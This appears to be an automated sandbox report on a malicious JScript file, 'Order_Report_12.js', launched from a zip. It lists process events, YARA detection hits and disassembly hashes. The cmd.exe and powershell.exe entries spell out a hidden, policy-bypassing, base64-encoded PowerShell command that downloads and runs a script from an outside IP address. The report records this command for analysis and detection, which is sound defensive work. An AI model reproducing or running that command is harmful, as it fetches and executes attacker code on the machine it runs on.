                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:32
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:36
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:58
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:59
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:8
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:12
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                Imagebase:0x7ff65b130000
                                                                                                                                                                File size:4612520 bytes
                                                                                                                                                                MD5 hash:D7874DD30BA935AAED6F730A0ED84610
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:42
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js'
                                                                                                                                                                Imagebase:0x7ff7a4fc0000
                                                                                                                                                                File size:165888 bytes
                                                                                                                                                                MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199880080.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197684686.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199731855.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10205510794.000001AF433E5000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10209412160.000001AF44E70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197150129.000001AF43121000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204790473.000001AF43145000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197244915.000001AF43145000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204512036.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.10204700660.000001AF43121000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.10199569415.000001AF430F8000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:48
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
                                                                                                                                                                Imagebase:0x7ff633bc0000
                                                                                                                                                                File size:280064 bytes
                                                                                                                                                                MD5 hash:9D59442313565C2E0860B88BF32B2277
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:49
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff703e40000
                                                                                                                                                                File size:885760 bytes
                                                                                                                                                                MD5 hash:C5E9B1D1103EDCEA2E408E9497A5A88F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:11:49
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
                                                                                                                                                                Imagebase:0x7ff6732e0000
                                                                                                                                                                File size:451584 bytes
                                                                                                                                                                MD5 hash:CDA48FC75952AD12D99E526D0B6BF70A
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10523891301.000001C9302F0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000016.00000002.10483734570.000001C92CFC0000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10486540996.000001C92D220000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10487123418.000001C92EAE0000.00000004.00000040.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000003.10471709581.000001C9473AE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.10534609217.000001C9473AE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000003.10471907288.000001C9473AE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 86311e2085a1822f42dd9f1d402237d171c8edd3fceb6f753042ca29b6b0efa6
                                                                                                                                                                  • Instruction ID: 582bde30652e82c9fac1197f49c8386a9f2711cb9714cfbc3d877cfc72d258e2
                                                                                                                                                                  • Opcode Fuzzy Hash: 86311e2085a1822f42dd9f1d402237d171c8edd3fceb6f753042ca29b6b0efa6
                                                                                                                                                                  • Instruction Fuzzy Hash: 81E1A270A18A4D8FDF88DF5CC495AA97BF1FF69310F1481A9D40DD7296DA34E882CB80
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f656b3fa76c92bd10bb17c4aeefd51272ba0526cd15332dac1caa40344829349
                                                                                                                                                                  • Instruction ID: fd31d3118c346e3b1c33382f0e5ca7f2a2606f9cc972b81f80044783415b1511
                                                                                                                                                                  • Opcode Fuzzy Hash: f656b3fa76c92bd10bb17c4aeefd51272ba0526cd15332dac1caa40344829349
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CD12626A0EBC68FE796976C08695B97FE4DF57224B0840FBE14DC7193EC089C45C396
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1992dd1ea4e2be88d310760447965a37b4581d9de5be07fdd9693f24685a5462
                                                                                                                                                                  • Instruction ID: 589341432ef4fb752d6e2fb4ed3e74c0c1e6add87ae3c39d82a95b25aa4291db
                                                                                                                                                                  • Opcode Fuzzy Hash: 1992dd1ea4e2be88d310760447965a37b4581d9de5be07fdd9693f24685a5462
                                                                                                                                                                  • Instruction Fuzzy Hash: F1E1357190EB8A8FEB56DB6888595B97FE4EF47310B0841FBD24DCB193DA18AC05C352
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2bf24ab03854e16d4516042ce2fa067d49a71d1b200b243cb33b94f90ce99eaa
                                                                                                                                                                  • Instruction ID: b2d8324844cba85d331948a5d679518f99e2be491803ed5c3236c9e0b7bb5727
                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf24ab03854e16d4516042ce2fa067d49a71d1b200b243cb33b94f90ce99eaa
                                                                                                                                                                  • Instruction Fuzzy Hash: A0D1367190DB8A8FE796E76848596B9BBE4EF07314B0841FED54DCB193DA18EC01C342
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 59507659ba26066072641baa7975ac0c01b80865c4d606f562499fbe7dec3704
                                                                                                                                                                  • Instruction ID: 65e9308b4cf1763dbffea7039b03fdf2c2e2a5e6cd38110ab31122f682dd953b
                                                                                                                                                                  • Opcode Fuzzy Hash: 59507659ba26066072641baa7975ac0c01b80865c4d606f562499fbe7dec3704
                                                                                                                                                                  • Instruction Fuzzy Hash: 35D17E75A08A4E8FDF95EF5CD495AE97BE1FF69300F1481B6D40ED7285CA24E8818B80
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6240ef8e08c28feb7f424e85b7d25ffad2098fb1be406d4af5af99b510995f26
                                                                                                                                                                  • Instruction ID: 6dcbaaff677e9063304ac6a7b88bbe33f87ded73e4dff5d49d17fc5c9d790d50
                                                                                                                                                                  • Opcode Fuzzy Hash: 6240ef8e08c28feb7f424e85b7d25ffad2098fb1be406d4af5af99b510995f26
                                                                                                                                                                  • Instruction Fuzzy Hash: FDB1036190E7C68FE797876888695787FE5EF53210B0941FED24DCB193CA1C9C4AC352
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539604079.00007FFA68450000.00000040.00000001.sdmp, Offset: 00007FFA68450000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68450000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: !U_^$[ U
                                                                                                                                                                  • API String ID: 0-3521920630
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000016.00000002.10539166773.00007FFA68380000.00000040.00000001.sdmp, Offset: 00007FFA68380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffa68380000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: !U_^$[ U
                                                                                                                                                                  • API String ID: 0-3521920630
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%